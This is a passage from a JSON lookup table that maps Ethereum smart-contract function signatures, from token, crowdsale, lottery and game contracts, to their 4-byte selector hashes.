"0xc0c98d6f", "SHAREFIDENCE()": "0xef77b601", "_transferFunc(address,address,uint256)": "0xeebbd2b7", "TcToken(uint256,string,uint8,string)": "0x86496e2e", "getListOfAddresses()": "0x11adbaad", "setAuthorizedSpender(address)": "0xe85f3fb0", "transferToGrowthReserve()": "0x46352ad9", "advisorsAllocationTokenSend(address,uint256)": "0x4c228656", "ConnectCoin()": "0x95ad3d98", "teamAllocationTokenSend(address,uint256)": "0xcbb50d30", "marketingAllocationTokenSend(address,uint256)": "0x1b6c104e", "growthReserveTokenSend(address,uint256)": "0xec7219a1", "getPost(bytes32)": "0x93e43bbe", "transferFromPublicAllocation(address,uint256)": "0x8fc1d08b", "savePost(bytes32,uint256)": "0x8551e3fe", "getTokenCreator(uint256)": "0x934689a9", "setPriceStep8(uint256)": "0xcb5b6bef", "setPriceStep7(uint256)": "0x18d97731", "setPriceStep6(uint256)": "0xef8594be", "setPriceStep5(uint256)": "0xbe0f0a50", "setPriceStep4(uint256)": "0x4bb72dea", "setPriceStep3(uint256)": "0x25a42081", "setPriceStep2(uint256)": "0x872628e8", "setPriceStep1(uint256)": "0x50b149a9", "setCreatorFeePercent(uint256)": "0x6ff6c4b8", "setCurrentOwnerFeePercent(uint256)": "0x47ea13df", "setBaseURI(string)": "0x55f804b3", "setInitialTokenValue(uint64)": "0xd1477f7b", "setCreationFee(uint64)": "0x1a12e7a9", "setCEOAddress(address)": "0xbc294a7c", "mint(string)": "0xd85d3d27", "getNewTokenPrice(uint256)": "0xd24987fc", "OverseasReturneesUnion()": "0xfbb4d51b", "allocateLedTokens()": "0x3f19bfbf", "getInfoLevels()": "0xb5fe79db", "CryptoCurrencyExchange()": "0xa718309f", "createProxyImpl(address)": "0xbd5ca3a3", "affiliateName(address)": "0xd5bf158a", "registerAffiliate(address[],uint256[],string)": "0xc9e01787", "signUp(address[],uint256[],string)": "0xf492a72f", "update(address,address,address,uint256,uint256,address)": "0xe0b9e83d", "registerAffiliate(address,string)": "0x34b55235", "payout(address[])": "0x4180c2d5", "init(address,address[],uint256[],address,string)": "0x17342d36", "isAffiliated(address)": "0x9ab102ac", "Salome()": "0x3da69ff4", "TrinityToken()": "0xef9124e1", "TestETCCoin()": "0x2413372d", "_draw3()": "0x32606387", "setCallbackGas(uint256)": "0x01d09a3c", "setRandomGenerateMethod(uint8)": "0x302f4303", "nextround()": "0x77faffa0", "abc_initNetwork()": "0xfdaf150c", "abcLottoController()": "0xb6a48c2a", "medsupply()": "0xcb29eee0", "InvestmentToken()": "0x1abe8385", "JTEBIT(address,uint256)": "0xa6856e9d", "BetCoin()": "0x14709544", "SLKToken()": "0xa6e5303a", "collectEtherBack()": "0x6e56dce5", "collectAirDropTokenBack()": "0x35f27b20", "sendTokensManually(address,uint256,uint256)": "0x4dc666b3", "sendTokens(uint256,uint256)": "0x31bcd2b7", "SalesManager()": "0x517f4a23", "ABsCoin(address,uint256)": "0x8ba92763", "setFundManager(address)": "0x232a3060", "setDepositPool(address)": "0xc569fb36", "getMarketer()": "0x4c0b1c90", "getPixelDistributor()": "0x0cec1ecd", "getFundManager()": "0x6c7113e4", "getContentsManager()": "0x1fbd3564", "getRoleManager()": "0x51331ad7", "getDepositPool()": "0x3de1a4bc", "getUserPaybackPool()": "0x2d118bbf", "getReportRegistrationFee()": "0xe0e9b349", "getUserPaybackRate()": "0x1250ca3d", "getInitialDeposit()": "0x30b3409e", "getDepositRate()": "0xb790634e", "getCdRate()": "0xcf6efb49", "ANRToken()": "0xe1ab690e", "MTC(address,address,address,address,address,address,address)": "0x5765dd1a", "ZiggyToken()": "0x80b855d6", "B3nsToken()": "0x0a6a3f00", "beginPwn()": "0xc2381296", "deployContracts(uint256,address)": "0xf992905d", "checkPwnData()": "0xbdf3390e", "emergency(bytes32,bytes1)": "0xe030dfb9", "viewPassword(uint256)": "0xf43b4808", "viewIndexNumber()": "0x3617d5c6", "getAdvancedTransfer(bytes32,bytes32)": "0x855b7f5b", "AdvancedDeposit(bytes32,bytes32)": "0x9ca2b9e4", "changeCommissionFee(uint256)": "0x1cf196df", "bizp()": "0x6a310bac", "MarkLesterMiranda()": "0x7c8e8e69", "processAndCheckParam(string,address,uint8[],bytes32[],bytes32[])": "0x5012416f", "getMsgHash(address,string,string)": "0xd25119c7", "clearTimeMap()": "0x66901c5b", "submitTransactionToken(address,address,string,string,uint8[],bytes32[],bytes32[])": "0x96fef3f1", "submitTransaction(address,string,string,uint8[],bytes32[],bytes32[])": "0xfc09ff9e", "strToBytes(string)": "0x4865a24a", "setCompletionTime(uint256)": "0x5201effb", "getControllerAddress()": "0xc57380a2", "abcLottoResolver()": "0x8fe8a0a6", "OSTestToken()": "0x23732ad8", "moveLeftOvertokensToartistPool()": "0x4b18be1d", "softcap3Reached()": "0xc47e7bcb", "softcap2Reached()": "0x9f9b3d98", "softcap1Reached()": "0x3203fe4b", "allocateFoundersTokens()": "0x2c2e3abe", "payFor(address)": "0x8e7b36be", "RewireToken()": "0x318992d0", "hashDetails(uint256,address,uint256,uint8)": "0x59330b8e", "mintToken(uint256,address,uint256,bytes32,uint8)": "0x8bf68690", "burnToken(uint256,string)": "0x010f7735", "TestIOTACoin()": "0xf9cc6fce", "CHF_Omnidollar()": "0x97a315ff", "FIBASK()": "0x95f5784f", "resetLotteryManually()": "0x327c0dd9", "validate(address,address,uint256)": "0xaa3ad4e4", "withdrawl()": "0x3aedfb8b", "setWeiRaiseLimit(uint256)": "0x6344a898", "setTokenFrom(address)": "0x4ab9792d", "setState(bool)": "0xac9f0222", "ZitKOINCrowdsale(uint256,uint256,uint256,address,address)": "0xb1f42430", "DARK()": "0x1615e11d", "post(address,address,uint256,string)": "0xa8df3e69", "post(address,string)": "0x875a8dfc", "GlowToken()": "0xb5b3fc07", "addCoin(uint256)": "0xa56793ae", "burnCoin(uint256)": "0xa3262e57", "YouRyuCoin(uint256,string,string,uint8)": "0xb5a678d7", "paySeller()": "0xa0c97bce", "updateAvailability(uint256)": "0x48330cf6", "resumePurchases()": "0x60e6fb26", "haltPurchases()": "0x08551d34", "KAPcoin(uint256,string,string)": "0xbd457de2", "freezeContract(bool)": "0x6b4c0789", "QRG(uint256,string,string)": "0x6e8e39d1", "VertexCoin()": "0x484293a7", "issueToken(address,address,uint256,uint256,uint256)": "0x140cd7af", "CryptoChallenge()": "0xc10a0840", "InfiniteCorridor()": "0x044f19bd", "Fee(address[],string,uint8,string)": "0x5e3bcaf7", "ElectricUniverse()": "0x2829104b", "Lucky888Token()": "0x343a8d56", "DECToken(uint256,string,string)": "0x01e91872", "optimalExp(uint256)": "0x95050862", "optimalLog(uint256)": "0xa324cca0", "generalExp(uint256,uint8)": "0x29576c82", "generalLog(uint256)": "0x4c3eea9e", "safeLock(uint256,uint256)": "0xb3fc0c83", "setMaxLockPeriod(uint256)": "0x55889d01", "STEToken()": "0x5cdd7560", "_freeze(address,bool)": "0x358592ce", "transferAndFreeze(address,uint256)": "0x8d995f94", "usersCanUnFreeze(bool)": "0xf58d3321", "UranBank()": "0x80571e93", "makeAdmin(address,bool)": "0x40a57cb8", "revenue()": "0x3e9491a2", "MeissaToken()": "0x9a160ad9", "GalaxyCoin(uint256,string,string)": "0x8c832ef4", "JincorToken()": "0x71d3de2b", "closeShop()": "0x9b6dbc8a", "calculatePrice()": "0xd348b409", "calculateTokens()": "0x1800e68e", "Shop(address,string,string,uint256,uint32)": "0x72ef90e4", "Object(string,string)": "0xe527217b", "updateMDTRewardAmount(uint256)": "0x5478f06f", "updateFlipTokenRewardAmount(uint256)": "0xf76c0f4e", "updateBaseComparable(int256)": "0xb20f41ab", "updateTotalGasCost(uint256)": "0x5cfa353a", "updateMinBet(uint256)": "0xf7cf0aa1", "updateMaxBet(uint256)": "0xa55cd51c", "SurgeToken()": "0xb2594125", "SPPSeriesB(uint256,string,uint8,string)": "0x6efa0621", "COLDITION()": "0xadb9066e", "InternationalTourismCoin(uint256,string,uint8,string)": "0xa111b0da", "getRareCoinAddress()": "0xe098161b", "getEnded()": "0x0cc79a85", "getAuctionEnd()": "0x87dc0c55", "getTopBidders()": "0x3026aedf", "getBidDetails(address)": "0x8d07ae9f", "beneficiaryWithdraw()": "0x9af6549a", "setRCContractAddress(address)": "0x7f476471", "RareCoinAuction(uint256)": "0x71221e38", "CreateToken(address,uint256)": "0xb378e89b", "RareCoin(address)": "0xab80c807", "Kuberand()": "0x46d64aa2", "init_wallet(address[],uint256,uint256)": "0x90ca20e5", "init_daylimit(uint256)": "0x841d0ac3", "init_multiowned(address[],uint256)": "0xf17401de", "ResumeICO()": "0xcd7a2c3b", "PauseICO()": "0xcf5ae516", "Token99(uint256,address)": "0x4d0c381a", "GnarlyTimes()": "0xdfe81a26", "Athereum()": "0xfa036370", "NEON()": "0xaa9ad331", "RefundableCrowdsale()": "0x51ca6966", "CappedCrowdsale()": "0xa9995010", "saleStatus()": "0xf9020e33", "mintContributors(address[])": "0x2192b99d", "_forwardFundsWei(uint256)": "0x90018343", "_setContributor(address,uint256)": "0xa123422e", "_0xBitcoinCash()": "0x83ccc2b5", "EXOToken(address,address,address,address,address)": "0x00a22ee4", "resetWith(address,address)": "0x94b8e58e", "setSender(address)": "0xced32b0c", "CaterToken(address,address)": "0x037ef916", "reward(address,uint256,uint256,string)": "0xc2cb9927", "registerUserOnToken(string)": "0x8136c1b9", "isInit()": "0xb145a5b8", "CNT_Crowdsale()": "0x0dd3e1b1", "CNT_Common()": "0xe1baa9cb", "WhiteListAccess()": "0x23da9c4b", "registerUserOnToken(address,address,uint256,uint256,string)": "0x063a7400", "updateCrystal(address)": "0x7af1337b", "updateHashrate(address,uint256)": "0x570fceb0", "setupMiniGame()": "0xe53cfed9", "removeContractMiniGame(address)": "0x9ff12bba", "setContractsMiniGame(address)": "0x84ffcb5d", "subHashrate(address,uint256)": "0x3e870d63", "addHashrate(address,uint256)": "0xef7f2e1c", "subCrystal(address,uint256)": "0xb04eb639", "EduMetrix()": "0x662d5aa9", "RiesGraham()": "0x1dbcc5ad", "QRTok()": "0x578799b3", "sold(uint256)": "0x9c03facb", "buyCar(address,uint256,bool,address,uint256)": "0xb7d6f432", "buyBulkRegularCar(address,uint256[],address)": "0xfe9d744d", "buyBulkMidGradeCar(address,uint256[],address)": "0x03ef03b4", "buyBulkPremiumCar(address,uint256[],address)": "0x4cf52fa2", "setTypePrice(uint256,uint256)": "0x8ab5fcc5", "openShop(uint256)": "0xe2fa9ee0", "setPercentIncrease(uint256,uint256,uint256)": "0xf32e8038", "setCommission(address,uint256)": "0x31729a45", "attachPreOrder(address)": "0x09dd1761", "nextAvailableId(uint256)": "0xfcd792f4", "setTokenMeta(uint256[],uint256[],uint256[])": "0xa81d18d7", "giveaway(uint256,uint256,uint256,bool,address)": "0xf2d701a7", "mintFor(uint256,address)": "0xad62f1ca", "setGasAmount(uint256)": "0x0c8f78fb", "setChecksOn(bool)": "0xd3e837cb", "MBDCToken(uint256,string,string,uint8)": "0xf59da238", "LifeSet_004()": "0x1ed0c2cc", "GNNM(uint256,string,string)": "0x0a73f7c4", "burnGasAndFreeFrom(address,uint256,address,address[],bytes)": "0x5eac85d5", "burnGasAndFree(address,uint256,address,address[],bytes)": "0x582a466a", "theEBCC(uint256,string,uint8,string)": "0xc7c54e4d", "ATN(uint256)": "0xe4d76d3b", "LifeSet_008()": "0xffa2548a", "retrieveERC(address)": "0xd4afc8b6", "distributeSMILE(address[],uint256)": "0x8fd5a39e", "BTRS()": "0xc1e65cb9", "updateInfo(uint256,uint256,uint256)": "0x2aec9466", "createEvent(bytes32,bytes32[],address,uint256)": "0x5e7aa842", "priya()": "0xa0ce4ff8", "PBC()": "0x35de74b8", "_sendTokens(address,address,uint256)": "0x75e3e4d4", "getNumAdd(uint8)": "0xf10e5ceb", "determineNumber()": "0x2915a915", "setMyCut(uint256,uint256)": "0xeee09758", "setMaxPlayers(uint8)": "0x84cfca00", "isAddress(address)": "0x5c32460b", "BLOCKLAND()": "0x0e3bc6ca", "SetUp(uint256,address)": "0x13e5a3b1", "DubaiGreenBlockChain()": "0xc35a4d46", "grantCompanyCoins(address,uint256)": "0x6951b995", "grantMarketingCoins(address,uint256)": "0xc352fbda", "issueIcoCoins(address,uint256)": "0x7eee56f9", "ZanteCoin()": "0xf8975cd9", "modifyCreator(address,bool)": "0x2d44c049", "createBallot(string,bytes32[],uint256)": "0x2c642950", "reveiveToken(address,uint256)": "0x73f01104", "hasIssue(address,bytes32)": "0x14f8f160", "showIssueDetail(address,bytes32)": "0xe2059fdf", "issue(address,uint256,uint32,uint32)": "0x15f3161f", "getAllowAmount(address)": "0xcd027be5", "isAllowTransfer(address)": "0xb31e822b", "addWhiteList(address,uint256)": "0x6e2db8d7", "transferAndLockMulti(address[],uint256[],uint256[])": "0x55f0690d", "transferFromMulti(address[],address[],uint256[])": "0xe275f296", "Robet(uint256,string,string)": "0xa718e288", "XingchenToken()": "0xb34b4f69", "init(uint256,uint256,address,uint256,uint256,uint256,address,uint256)": "0x7d5a9b41", "DOXYCOIN()": "0x4495bbf7", "removeAddressFromAccountFor(address,address)": "0x03b4e20c", "addAddressToAccountForUser(address,bytes,bytes,address,bytes32)": "0x4cba67ce", "addAddressToAccount(address,bytes,bytes,bytes32)": "0x726802a4", "addAddressToAccountFor(address,bytes,bytes,address,bytes32)": "0x3dcbf7eb", "createAccountForUser(address)": "0x1c0bbe26", "createAccount(address)": "0x9859387b", "acceptInvite(bytes)": "0xf610e52a", "createInvite(bytes)": "0x49c462d7", "setRegistryAdmin(address)": "0x39069d8c", "Glv(uint256,string,uint8,string)": "0xd168f699", "setMultiETH(address[],uint256[])": "0x77312cdc", "setETH(address,uint256)": "0x00ed015b", "Instantium()": "0x3e42ad79", "Piezochain()": "0x1d693910", "WorkValley()": "0xa3b80993", "ARBITRAGING(address)": "0xb4350e69", "burnForGateway(address,string,uint64,uint64)": "0xdf958553", "changeGatewayAddr(uint32,address,string)": "0x6f62e755", "mintByGateway(uint32,uint64,address,string)": "0xb0036d32", "removeApp(uint32,string)": "0x917ec8e2", "addApp(address,uint32,uint32,string)": "0x2fee26ce", "addChain(string,string)": "0xa9f940c3", "removeVoter(address,string)": "0xd9037522", "addVoter(address,string)": "0xd9e95a98", "changeVoter(address,address,string)": "0xd4975d71", "start(string)": "0x258e60b6", "stop(string)": "0x745dcd4d", "confirmation(uint256)": "0xb17c3f99", "major(uint256)": "0x079c345d", "hasConfirmed(uint256,address)": "0x08aff933", "getPlayerAddr(uint256)": "0x4d0d35ff", "getPlayerLAff(uint256)": "0xe3c08adf", "getPlayerName(uint256)": "0x82e37b2c", "getLongExtra()": "0x4ccbe888", "getFastExtra()": "0x1a9be331", "getLongGap()": "0x114719c5", "getFastGap()": "0x18d0376c", "eth(uint256)": "0x5b4ef70b", "keys(uint256)": "0x0cb6aaf1", "ethRec(uint256,uint256)": "0x67af1cff", "keysRec(uint256,uint256)": "0x8e46b68b", "setOtherFomo(address)": "0xb483c054", "withdrawEarnings(uint256)": "0x6e70096e", "updateMasks(uint256,uint256,uint256,uint256)": "0xe9fa6277", "potSwap()": "0xed78cf4a", "updateTimer(uint256,uint256)": "0x06a9ce79", "updateGenVault(uint256,uint256)": "0xc9d96393", "verifyTeam(uint256)": "0x85af4142", "receivePlayerNameList(uint256,bytes32)": "0x8f7140ea", "receivePlayerInfo(uint256,address,bytes32,uint256)": "0x49cc635d", "iWantXKeys(uint256)": "0xcf808000", "calcKeysReceived(uint256,uint256)": "0xce89c80c", "calcUnMaskedEarnings(uint256,uint256)": "0xef4f6e9c", "getPlayerInfoByAddress(address)": "0xee0b5d8b", "getCurrentRoundInfo()": "0x747dff42", "getPlayerVaultsHelper(uint256,uint256)": "0xf310a19d", "getPlayerVaults(uint256)": "0x63066434", "registerNameXname(string,bytes32,bool)": "0x685ffd83", "registerNameXaddr(string,address,bool)": "0x3ddd4698", "registerNameXID(string,uint256,bool)": "0x921dec21", "reLoadXname(bytes32,uint256,uint256)": "0x079ce327", "reLoadXaddr(address,uint256,uint256)": "0x82bfc739", "reLoadXid(uint256,uint256,uint256)": "0x349cdcac", "buyXname(bytes32,uint256)": "0xa65b37a1", "buyXaddr(address,uint256)": "0x98a0871d", "buyXid(uint256,uint256)": "0x8f38f309", "GoodfieldRetail(uint256,string,string)": "0xbc6c06e7", "IQC()": "0xd4747f0a", "SGEICO()": "0xafc2cc46", "setTokenURL(address,string)": "0x0b5945ec", "addToken(address,string,string,uint8,string)": "0xf3a1d297", "DopeToken()": "0xcf0a50d3", "setExchangeAdapterManager(address)": "0x42bff0d0", "NinjaCoinNC()": "0xfae429af", "eBitcoincash()": "0x2a23ac02", "RevalootSwap()": "0xb9ffc576", "freedomcryptotoken(uint256,string,string)": "0x5c0fc34c", "treatRemaintoken()": "0x887159a2", "setManyWhitelist(address[])": "0xdc92beec", "setAdminlist(address,bool)": "0x0a9848ac", "PJRToken()": "0x5e355dcc", "PUMPHODL()": "0x979bfba7", "onTransferOwnership(address,address)": "0x4153d751", "setWord(string)": "0xcd048de6", "HelloWorldContract()": "0x3bf03e9e", "NFCToken()": "0x9840a504", "setCrowdSale(bool)": "0xae62fd7c", "calculateAndSetRate(uint256)": "0x6695f930", "addExperience(uint256,uint256)": "0x5d240c58", "_createCenturion(address)": "0xc16d515a", "purchaseCenturion(uint256)": "0xb73114b9", "cancelCenturionSale(uint256)": "0x0f74a5cc", "sellCenturion(uint256,uint256)": "0xba6f30e4", "listCenturion(uint256)": "0xbaa28752", "issueCenturion(address)": "0x205c7cf5", "createCenturion()": "0x8348fe61", "getCenturion(uint256)": "0x832f6412", "_getShinyPurity(uint16,uint16)": "0xe87aa769", "getRemainingAirdropSurplusAddressesLength()": "0x35cbe716", "setPreviousSurplus(address[],uint256[])": "0xf0d7c9ff", "MovieCoin(uint256,uint256)": "0xf78dd0c1", "ADBToken()": "0x0293fafc", "Dex(address,address,address,uint256,uint256,uint256)": "0x8a6700e8", "SPTS()": "0xc09a898d", "Bittelux()": "0x888808ba", "BenefitGameToken()": "0x4d1bfe99", "getUpgradeCardList(address)": "0xe2935edb", "ZoomToken()": "0x1bdb3f65", "lockForAll(bool)": "0x5507e9c0", "TongToken()": "0xd3701ff2", "OmegaProtocol()": "0xd88e92a7", "changeOrigDev(address)": "0x6e3ae353", "setLastTier(uint16)": "0x4ae8ef06", "setMnyTiers(address)": "0xedd40c3c", "addMiningToken(address,uint256)": "0xd98e2997", "setIsMiningOpen(bool)": "0x6140ca78", "_startSwap()": "0x6588c11c", "_mine(address,uint256)": "0x91d0b3fd", "loadData()": "0x100b815d", "getTier(uint16)": "0x576c3de7", "addTiers(uint16,uint256[],uint256[])": "0x1b3a91ac", "YunKaiCoin()": "0xcbe7b838", "buyTokens(address,bytes32)": "0x2c86d091", "COLONERToken()": "0xd0900033", "ICHAINToken()": "0xe9f88ca5", "activateDestruction()": "0x92c9a9e2", "distributeBonuses()": "0xc875b1fb", "finishHardcap()": "0x0c3c92a3", "issueSoftcapToken(address,address,uint256)": "0xfbf22dea", "issueHardcapToken(address,address,uint256)": "0xc661deb4", "setReferralBonus(uint256)": "0x9a037aa0", "setVIPBonus(uint256)": "0xaf77f8bd", "setPayoutFee(uint256)": "0xe18e34d5", "retireMaster(address)": "0x6e970dfd", "globalReinitialization()": "0x8809540d", "bytesToUint1(bytes)": "0x052ab49c", "msgdata()": "0xe9ac31f2", "QripplexToken()": "0x6cca5065", "requestLoans(uint256[],bytes32[])": "0x9bfdf68d", "transfer(address,uint256,bytes,bytes)": "0xe9b07bbf", "createMulti(uint256,address[])": "0x5ba13abf", "showText()": "0x07bc8829", "revokeAllowance(address)": "0xad11fe44", "changeStatus(bytes1,bytes32)": "0x8e90b71a", "addDeal(uint256,uint256,string,string,uint256,string,bytes32)": "0xd38875ec", "changeServiceAddress2(address)": "0x8d8d22ba", "giveGreed()": "0xbcd4144b", "devSend()": "0xde4b4073", "MaximCoin()": "0xcd866ee1", "sendMessage(address,uint256,bytes)": "0x9f3ce55a", "getPeerMessageCount(address,address)": "0xa80d2fb4", "handleRef(address,uint256,uint256,uint256)": "0x14c2d2e0", "setFeeRates(uint8,uint8,uint8)": "0x8d664d6a", "setAltFundAddress(address)": "0x0c9c1c58", "setFundFeeAddress(address)": "0x3676049b", "AcceptsHyperDivs(address)": "0xcf4d6c0b", "NeuralNetwork()": "0x78bca3e7", "getERC20(address,address,address,uint256)": "0xb157528b", "getABsort()": "0x301b9307", "checkBalance(uint256[])": "0x6cf3b9e9", "estimate(string)": "0x37a59139", "compose(string)": "0x85609b1c", "changeBPaddress(address)": "0xd4332f50", "delABaddress(uint256,address,address)": "0xcfeb93a8", "addABaddress(address,address)": "0x3336d5e5", "updateShare(address[],uint256[])": "0x8027dece", "frozenBalancesOf(address)": "0xcd8e250a", "setFreezePercent(uint8)": "0xaa5c88ca", "payedBalancesOf(address,uint256)": "0xb0a84974", "freeze(address,uint8)": "0x6f71f407", "subtractFrozenBalances(address,uint256)": "0x96ecf3c4", "addFrozenBalances(address,uint256)": "0xcf187df1", "init(uint256,string,string,uint8)": "0x15194a9f", "dist_developer(address,uint256)": "0x72ea61e8", "dist_multiple_airdrop(address[],uint256)": "0xe99ebee2", "dist_airdrop(address,uint256)": "0xf5a5438e", "dist_privateSale(address,uint256)": "0xacc9383a", "burn_all_unsold()": "0x945c6cf8", "youAre(address)": "0xdceaf74c", "UNC()": "0x174609f8", "ConvnertToSecret(uint8,string)": "0xe155b66c", "getPlayerBalance()": "0x0b01517c", "changeBetRange(uint256)": "0x820f9b85", "getSecretBet(address)": "0xde887bba", "ViewBet(address)": "0xe8aada0c", "ViewBet()": "0x8c4b7300", "revealWinner(string)": "0x4fcf1f39", "RevealBet(string)": "0xf4fc5d13", "revealStart()": "0xc7fbad27", "SubmitSecretBet(bytes32)": "0x9b68c992", "commitStart(bytes32)": "0x49a67b55", "payForOther(address)": "0xb39f4171", "GetGameInfo()": "0xdc09426c", "PrimaToken()": "0xff34ef7d", "IsExchanged(address,string)": "0x7f967a8c", "Exchange(address,string)": "0x8082ee0d", "GetGiftInfo(string)": "0x1d24190c", "DelGift(string)": "0x0e3484c1", "AddGift(string,uint256,uint32[],uint256[])": "0x097c3ead", "HasGift(string)": "0x14a528f2", "ClearAuth(address)": "0xcc9b714c", "SetAuth(address)": "0xbf7abee6", "CanHandleAuth(address)": "0x5d47f4f2", "InitMaster(address)": "0x97c911d5", "GetPartNum(uint8)": "0x22f905ec", "GetPartWeight(uint8,uint256)": "0x51a14c9f", "IsLimitPart(uint8,uint256)": "0x559b678c", "getInvestorUnPaidAmount(address)": "0x9e4ece80", "setPayoutCumulativeInterval(uint256)": "0x5a181478", "setDatePayout(address,uint256)": "0xa55bbff9", "getInvestorDatePayout(address)": "0x39a1ec37", "getInvestorDeposit(address)": "0x2d57b6c8", "payoutSelf(address)": "0x4bbcc1bc", "CCTE()": "0x742a1a56", "IvoryTest()": "0x95977749", "ALLANCOIN()": "0x409a3d8f", "safeWithdrawal3(address)": "0x8a6c02ae", "safeWithdrawal2(address)": "0x12a0421c", "triggerEvent(string,string)": "0x02172276", "buy(address,bytes,bytes32)": "0x948623dd", "getMaxLimit()": "0xdf6d4843", "setMinLimit(uint256)": "0x6ec6d4a6", "setMaxLimit(uint256)": "0xbf8bcee4", "validateSignature(bytes,bytes32)": "0x9d932a93", "fastEnd()": "0x23bf0425", "take(address,uint256)": "0x52180208", "DrawCom()": "0x7ec2fd95", "DrawOp()": "0x003338a0", "BuyTicketUseVaultSeed(uint256)": "0x7b3e2ce0", "BuyTicketSeed()": "0xd9cd6046", "Ethercoin()": "0xa0fa930a", "Halo3DDoublr(uint256,address)": "0x7d93ccdf", "ACNCToken()": "0xaffbe8ab", "WesTechToken()": "0x4a601994", "VeraCoinPreSale(uint256,uint256,address,address,uint256,uint256,uint256,uint256)": "0x573d2411", "VeraCoin()": "0xf0829c37", "MDTKAirdrop(address,address)": "0xe39062f5", "BaseAirdrop(address,address)": "0x350b4cb6", "ERC223()": "0x4ad4fa5d", "EtherCarbon()": "0x0ce6bd26", "ethereumhorse()": "0xb27c4cde", "solve(int8)": "0x448d8910", "place(int8)": "0xafcb0d3a", "Gamble()": "0x7428c5f4", "Rate()": "0x1b8e94a1", "Period()": "0x90414116", "DAICO()": "0x794b0c62", "revertAML(address)": "0xc541a5bd", "toggleKYC(address,bool)": "0xdee6e5a4", "init(address,address,address,address,address,address,address,address,address,address,address,address,address,address)": "0x126262a3", "toggleFunding(bool)": "0x0d37ac7f", "KOINCONEKT()": "0xb6304c2a", "adminResetEmail(address,address,string)": "0xd754a6bc", "dividendsGetPaid(uint256)": "0x9fb52b6e", "setDividends(uint256,uint256)": "0xfaad4a49", "withdrawDividends(uint256)": "0x2514a6b4", "PMHToken(uint256,string,uint8,string)": "0x030d945c", "Metadollar()": "0x31c78498", "SmillesCoin()": "0x013fc2a3", "Capsule(uint256,address)": "0x3f395781", "JixoCoin(uint256,string,string)": "0xb9910c5f", "PURA()": "0xb3d4e41f", "GCOXToken(string,string,uint8,uint256)": "0x85c9dd72", "withdrawForFiveYear()": "0xbbb1c4c0", "withdrawForFourYear()": "0xeb685867", "withdrawForThreeYear()": "0x1afd96dc", "withdrawForTwoYear()": "0xcddc37c1", "withdrawForOneYear()": "0x672e06d0", "BIU()": "0xb9fac520", "invitedInit(address,address)": "0xb9cb385d", "inviteInit(address,address)": "0x79683e63", "changInviteAmountLimit(uint256)": "0xa78c81ea", "changeInvitedReward(uint256)": "0x2bba2d6d", "changeInviteReward(uint256)": "0x7b10a1d9", "changeDividend(uint256)": "0xfc73ec00", "changeDivisor(uint256)": "0x513de1d3", "changeDecimals(uint256)": "0xafa5f45c", "startInvite()": "0x963a9a13", "finishInvite()": "0xf4591074", "JoygoEOS(string,string,uint256,uint256,uint256,uint256,uint256,uint256)": "0x6c17729b", "CryptoScalper()": "0x58339a40", "Weaver()": "0xd4365b4b", "STAT()": "0x23b5aa8d", "Testtoken()": "0x9c9421c3", "Ptest()": "0xcbbda00e", "TsingDaToken()": "0x4fd798b1", "aletoken(string)": "0x92708ce1", "UVDToken()": "0x9055172d", "DaoCasinoToken(uint256,uint256,uint256,address)": "0xd3890a43", "setConversionRate(uint256)": "0xd2e80494", "EosPizzaSliceDonationraiser(address)": "0x181da773", "setWhitelistEntries(address[],bool)": "0xdd4a8361", "Whitelist(address)": "0xeb73900b", "releaseAdvisorsAccount()": "0x17e95fbc", "releaseCoreTeamAccount()": "0xc1873e26", "totalTokensLocked()": "0xdc5bf961", "EosPizzaSliceSafe(address)": "0x868e3c52", "releaseAccount(uint8,address)": "0xe73de430", "addLockedAccount(uint8,address,uint256)": "0xb8e9a6f0", "initBundle(uint8,uint256)": "0x6fc9958a", "TokenSafe(address)": "0xa78082aa", "EosPizzaSlice(uint256)": "0x8bccb1b4", "HasOwner(address)": "0x849ab974", "mintReservation(address[],uint256[])": "0x4d912393", "initPGOMonthlyPresaleVault(address[],uint256[])": "0x7403e980", "initPGOMonthlyInternalVault(address[],uint256[])": "0x6dfe512e", "unreleasedAmount()": "0x549aa194", "getListOfSupportedTokens()": "0xea4e6ded", "removeSupportedToken(address)": "0x76319190", "addSupportedToken(address)": "0x6d69fcaf", "WineSpiritCoin()": "0xb69ea1e9", "getXRateProviderLength()": "0xffdb0eb3", "suspend(uint256)": "0x4b865846", "SubscriptionModuleImpl()": "0xcb14b170", "isSuspended()": "0x1d130935", "subscriptionStatus(uint256)": "0x492f8724", "subscriptionDetails(uint256)": "0x2ef01862", "claimDeposit(uint256)": "0x5f8534ae", "createDeposit(uint256,uint256,bytes)": "0x12c723e1", "cancelSubscriptionOffer(uint256)": "0x9b33f055", "unholdSubscriptionOffer(uint256)": "0x799f4079", "holdSubscriptionOffer(uint256)": "0x91c72d88", "updateSubscriptionOffer(uint256,uint256)": "0x9649ccaa", "createSubscriptionOffer(uint256,uint16,uint256,uint256,uint256,uint256,uint256,bytes)": "0x54d734e2", "stateCode(uint256)": "0xd056cc69", "claimSubscriptionDeposit(uint256)": "0xc2222b80", "returnSubscriptionDesposit(uint256)": "0x1c196d77", "postponeDueDate(uint256,uint256)": "0x646cd69b", "executeSubscription(uint256)": "0xe8903656", "unholdSubscription(uint256)": "0xe5e88590", "icoStatus()": "0xd96e1f76", "givecandyto()": "0x9f8adeb8", "maxCap()": "0x23548b8b", "affiliate()": "0x45e05f43", "exchangeableTokensFromStock()": "0xf3cbe7b5", "totalDivided()": "0x080ca381", "crowdsaleOpeningTime()": "0xa339abd5", "Development()": "0x94e8075d", "nextLotteryTTMTokenId9()": "0x78730d65", "nCanOpenRewardMinEth()": "0x0faaa357", "getEventAddress()": "0xd427ccbf", "totumPhases()": "0x9696e59a", "rewardAddressesSet()": "0xf01dbd03", "RANDOMIZER_RETRY_COUNT()": "0x79f645ea", "Addr1()": "0x56ad609e", "initialFiatPerEthRate()": "0x50e9f948", "refundDeadLine()": "0xbff7df7c", "optionExerciseSpan()": "0x9dcd4beb", "PRE_SALE_20_BONUS_MIN()": "0xca7c95f2", "tokensFromPreviousTokensale()": "0x8b2909cf", "WINNER()": "0xb108501f", "windowPeriod()": "0x451e422e", "minerSaleCount()": "0xf771bc6b", "Dashgold()": "0x76a766f7", "MYSYMBOL()": "0x586ab7a9", "totalICO()": "0x7658d5ef", "totalLeaderboards()": "0xdc74665e", "streamityContractAddress()": "0x4f1fa7ef", "limitCrowdsale()": "0xc906c873", "referralsVault_()": "0x074b1e61", "funds_address()": "0xd6619ffb", "teamOneDivsTotal()": "0x569f76e1", "fundContractForRefund()": "0x60c46821", "POHStopTime()": "0x96a6a748", "adminAddr()": "0x81830593", "jackpotWinPercent()": "0xe7031501", 